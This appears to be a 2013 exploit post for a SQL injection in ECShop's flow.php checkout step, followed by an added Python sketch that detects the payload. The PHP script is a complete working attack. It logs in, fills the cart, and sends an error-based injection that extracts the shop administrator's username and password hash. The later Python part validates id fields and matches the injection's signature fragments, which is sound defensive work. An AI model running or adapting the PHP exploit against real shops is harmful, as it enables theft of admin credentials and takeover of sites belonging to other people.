ecshop-flow.php SQL injection 0DAY

2013-01-08 01:10

exp:

<?php
echo "
+-----------------------------------------------------------------------+
+Info: EXP for ECSHOP SQL injection+
+Code by  admin@ashker.net  +
+-----------------------------------------------------------------------+

";
// three arguments are required (user, password, shop URL), so $argc must be at least 4
if($argc<4){
echo "Usage: exploit.php user password http://www.shop.com/shop";
die();
}
$username=$argv[1];
$password=$argv[2];
$host=$argv[3];
$payload="country=1&district=409&consignee=matt&email=matt%40qq.com&address=matt&zipcode=matt&tel=matt&mobile=matt&sign_building=matt&best_time=matt&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkoute&address_id=&province=3";
$payload.="' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x3a,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #";
$myheader=array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: zh-cn,zh;q=0.5',
'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
'Referer: http://www.ashker.net/',
'Connection: Keep-Alive',
'Cache-Control: no-cache',
'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);
// log in and collect the session cookie from the Set-Cookie headers
$cookie="";
$str=curlsend("$host/user.php","POST",0,$myheader,"username=$username&password=$password&act=act_login&back_act=http%3A%2F%2F127.0.0.1%2Fshop%2F&submit=",1);
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
$cookie=$cookie.";".$array[1][$i];
}
echo "cookie:$cookie\n";
// fetch one goods ID from the front page and add it to the cart; the checkout step fails otherwise

$goods=curlsend("$host/","GET",0,$myheader,'',1);
preg_match('#goods\.php\?id=([0-9]{1,8})#', $goods, $hash);
$goodsid=$hash[1];
echo "goodsid:$goodsid\n";
curlsend("$host/flow.php?step=add_to_cart","POST",0,$myheader,"goods={\"quick\":1,\"spec\":[\"\"],\"goods_id\":$goodsid,\"number\":\"1\",\"parent\":0}",1);
// les'go
$buffer=curlsend("$host/flow.php","POST",0,$myheader,$payload,1);
//echo $buffer;
if(strpos($buffer,'doesn\'t exist')) {
// the admin table name may have been changed; inject by hand
die('表名可能修改,请手工注射');
}
preg_match('#\'([\S]+):([a-z0-9]{32})#', $buffer, $hash);
echo "username:".$hash[1]."\npassword:".$hash[2];

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $url);
// CURLOPT_POST takes a boolean; only switch to POST when the caller asked for it
curl_setopt ($ch, CURLOPT_POST, $method === "POST");
curl_setopt ($ch, CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
return $handles;
}
?>
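A defender-side counterpart, added here and not part of the original post or of ECShop itself: it inspects a flow.php checkout body the way a hardened handler or a WAF rule would, rejecting non-numeric id fields (the validation that neutralises this injection) and flagging the error-based signature fragments the payload above relies on. The field list and the two sample bodies are constructed from the exploit's own parameters; the exploit body is a shortened form of the payload with a dummy inner subquery.

```python
import re
from urllib.parse import parse_qs

# Parameters the checkout step of flow.php should only receive as integer ids
# (constructed list, taken from the field names in the exploit's POST body).
NUMERIC_ID_FIELDS = ("country", "province", "district", "address_id")

# Building blocks of the error-based (duplicate-key) injection used above:
# count(*) + concat(...) + floor(rand(0)*2) + group by, reading information_schema.
SIGNATURES = {
    "count(*)": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "floor(rand()*2)": re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", re.I),
    "group by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
}

def inspect_checkout_body(body):
    """Return a list of findings for one form-encoded POST body sent to flow.php.

    Two independent checks: (1) id fields must be empty or purely numeric, the
    validation that would have stopped this injection; (2) any parameter that
    carries two or more of the signature fragments is reported, which is the
    detection side for a WAF rule or a review of captured request bodies.
    """
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for name in NUMERIC_ID_FIELDS:
        for value in params.get(name, []):
            if value != "" and not value.isdigit():
                findings.append("non-numeric id field %s" % name)
    for name, values in params.items():
        for value in values:
            hits = [label for label, rx in SIGNATURES.items() if rx.search(value)]
            if len(hits) >= 2:
                findings.append("error-based injection signature in %s: %s"
                                % (name, ", ".join(hits)))
    return findings

# Constructed sample bodies: a benign checkout and a shortened exploit payload.
BENIGN_BODY = ("country=1&district=409&consignee=matt&step=consignee"
               "&act=checkoute&address_id=&province=3")
EXPLOIT_BODY = (BENIGN_BODY
    + "' and (select 1 from(select count(*),concat((select 1),floor(rand(0)*2))x"
    + " from information_schema.tables group by x)a) and 1=1 #")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("exploit", EXPLOIT_BODY)):
        print(label, inspect_checkout_body(body))
```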

Source: www.ashker.net/index.php/archives/634
